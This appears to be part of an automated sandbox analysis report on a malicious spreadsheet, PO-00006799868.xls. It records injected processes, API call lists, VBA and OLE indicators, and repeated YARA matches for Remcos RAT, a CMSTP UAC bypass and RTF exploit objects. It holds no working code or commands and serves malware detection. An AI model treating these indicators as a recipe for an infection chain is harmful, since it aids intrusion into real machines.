Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_0021A279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

10_2_0021A279

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_00208638 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

10_2_00208638

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 11_2_012C5264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

11_2_012C5264

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A86336	10_3_02A86336
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A7C0A1	10_3_02A7C0A1
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A50687	10_3_02A50687
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A72707	10_3_02A72707
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A7E759	10_3_02A7E759
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A664FE	10_3_02A664FE
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A62590	10_3_02A62590
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A64A80	10_3_02A64A80
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A70A04	10_3_02A70A04
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A7CEF5	10_3_02A7CEF5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A70EF8	10_3_02A70EF8
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A64CC0	10_3_02A64CC0
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A76C13	10_3_02A76C13
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02AD720D	10_3_02AD720D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A5F240	10_3_02A5F240
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A7B326	10_3_02A7B326
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A71310	10_3_02A71310
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A89035	10_3_02A89035
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A71745	10_3_02A71745
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A5D460	10_3_02A5D460
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A63540	10_3_02A63540
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A71B7A	10_3_02A71B7A
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02ACF865	10_3_02ACF865
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A85852	10_3_02A85852
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A819AE	10_3_02A819AE
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02ACFCE2	10_3_02ACFCE2
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A5DC00	10_3_02A5DC00
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A65C41	10_3_02A65C41
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A85DC4	10_3_02A85DC4
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02AADD28	10_3_02AADD28
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02AB7D32	10_3_02AB7D32
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A87D0F	10_3_02A87D0F
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001BE800	10_2_001BE800
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001D3307	10_2_001D3307
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001DDAF5	10_2_001DDAF5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001BFE40	10_2_001BFE40
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001BE060	10_2_001BE060
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001C4140	10_2_001C4140
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001D2345	10_2_001D2345
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_00230465	10_2_00230465
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001E6452	10_2_001E6452
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001E25AE	10_2_001E25AE
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001D277A	10_2_001D277A
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001C6841	10_2_001C6841
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_002308E2	10_2_002308E2
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_0020E928	10_2_0020E928
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001E890F	10_2_001E890F
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_00218932	10_2_00218932
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001C8968	10_2_001C8968
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001E69C4	10_2_001E69C4
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001DCCA1	10_2_001DCCA1
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001E6F36	10_2_001E6F36
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0126E800	11_2_0126E800
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01283307	11_2_01283307
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0128DAF5	11_2_0128DAF5
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0126FE40	11_2_0126FE40
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01274140	11_2_01274140
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0126E060	11_2_0126E060
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01282345	11_2_01282345
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012925AE	11_2_012925AE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012E0465	11_2_012E0465
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01296452	11_2_01296452
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0128277A	11_2_0128277A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012BE928	11_2_012BE928
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012C8932	11_2_012C8932
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0129890F	11_2_0129890F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01278968	11_2_01278968
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012969C4	11_2_012969C4
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01276841	11_2_01276841
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012E08E2	11_2_012E08E2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0128CCA1	11_2_0128CCA1
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01296F36	11_2_01296F36
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01273190	11_2_01273190
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012770FE	11_2_012770FE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0128F359	11_2_0128F359
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01261287	11_2_01261287
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01281604	11_2_01281604
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01275680	11_2_01275680
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01287813	11_2_01287813
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012758C0	11_2_012758C0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01281AF8	11_2_01281AF8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01299C35	11_2_01299C35
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0128BF26	11_2_0128BF26
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01281F10	11_2_01281F10
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012E7E0D	11_2_012E7E0D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_000B3620	11_2_000B3620

Source: PO-00006799868.xls

OLE indicator, VBA macros: true

Source: ~WRF{8ACACCBE-F49B-438C-81AF-59EF5D64236E}.tmp.4.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 01280C63 appears 70 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 01288A80 appears 42 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 01267F41 appears 35 times
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: String function: 02A77E80 appears 42 times
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: String function: 02A58E20 appears 32 times
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: String function: 02A58FF8 appears 32 times

Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96632497.doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
